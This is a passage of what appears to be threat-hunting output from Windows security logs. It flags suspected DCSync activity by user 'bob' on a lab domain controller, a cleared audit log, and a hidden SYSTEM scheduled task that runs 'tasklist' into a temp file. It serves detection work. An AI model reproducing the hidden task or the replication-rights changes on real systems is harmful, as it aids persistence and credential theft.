30-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14675</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.023629Z"">
</TimeCreated>
<EventRecordID>198242593</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2868"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">57DCCD4C-7381-4371-8480-D74D47019AD8</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14674</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
schedule task created,1553508330.695604,2019-03-19T04:02:04.335561+04:00,,Audit,High,schedule task created by user,4698,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4698</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T00:02:04.319945Z"">
</TimeCreated>
<EventRecordID>566836</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""452"" ThreadID=""2836"">
</Execution>
<Channel>Security</Channel>
<Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-1587066498-1489273250-1035260531-500</Data>
<Data Name=""SubjectUserName"">Administrator</Data>
<Data Name=""SubjectDomainName"">EXAMPLE</Data>
<Data Name=""SubjectLogonId"">0x17e2d2</Data>
<Data Name=""TaskName"">\CYAlyNSS</Data>
<Data Name=""TaskContent"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt;
&lt;Task version=&quot;1.2&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt;
&lt;Triggers&gt;
&lt;CalendarTrigger&gt;
&lt;StartBoundary&gt;2015-07-15T20:35:13.2757294&lt;/StartBoundary&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;ScheduleByDay&gt;
&lt;DaysInterval&gt;1&lt;/DaysInterval&gt;
&lt;/ScheduleByDay&gt;
&lt;/CalendarTrigger&gt;
&lt;/Triggers&gt;
&lt;Principals&gt;
&lt;Principal id=&quot;LocalSystem&quot;&gt;
&lt;UserId&gt;S-1-5-18&lt;/UserId&gt;
&lt;RunLevel&gt;HighestAvailable&lt;/RunLevel&gt;
&lt;LogonType&gt;InteractiveToken&lt;/LogonType&gt;
&lt;/Principal&gt;
&lt;/Principals&gt;
&lt;Settings&gt;
&lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt;
&lt;DisallowStartIfOnBatteries&gt;false&lt;/DisallowStartIfOnBatteries&gt;
&lt;StopIfGoingOnBatteries&gt;false&lt;/StopIfGoingOnBatteries&gt;
&lt;AllowHardTerminate&gt;true&lt;/AllowHardTerminate&gt;
&lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt;
&lt;IdleSettings&gt;
&lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt;
&lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt;
&lt;/IdleSettings&gt;
&lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;Hidden&gt;true&lt;/Hidden&gt;
&lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt;
&lt;WakeToRun&gt;false&lt;/WakeToRun&gt;
&lt;ExecutionTimeLimit&gt;P3D&lt;/ExecutionTimeLimit&gt;
&lt;Priority&gt;7&lt;/Priority&gt;
&lt;/Settings&gt;
&lt;Actions Context=&quot;LocalSystem&quot;&gt;
&lt;Exec&gt;
&lt;Command&gt;cmd.exe&lt;/Command&gt;
&lt;Arguments&gt;/C tasklist &amp;gt; %windir%\Temp\CYAlyNSS.tmp 2&amp;gt;&amp;amp;1&lt;/Arguments&gt;
&lt;/Exec&gt;
&lt;/Actions&gt;
&lt;/Task&gt;</Data>
</EventData>
</Event>",WIN-77LTAPHIQ1R.example.corp,Security
Audit log cleared,1552953724.335561,2019-03-25T14:05:30.695604+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T09:09:14.916619Z"">
</TimeCreated>
<EventRecordID>198238040</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""744"" ThreadID=""2028"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-738609754-2819869699-4189121830-1108</SubjectUserSid>
<SubjectUserName>bob</SubjectUserName>
<SubjectDomainName>insecurebank</SubjectDomainName>
<SubjectLogonId>0x8d7099</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.023629Z"">
</TimeCreated>
<EventRecordID>198242592</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""896"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">57DCCD4C-7381-4371-8480-D74D47019AD8</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14675</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.023629Z"">
</TimeCreated>
<EventRecordID>198242591</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""3616"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">A1AA38AA-447E-46C2-ABA0-D205D4D8F873</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR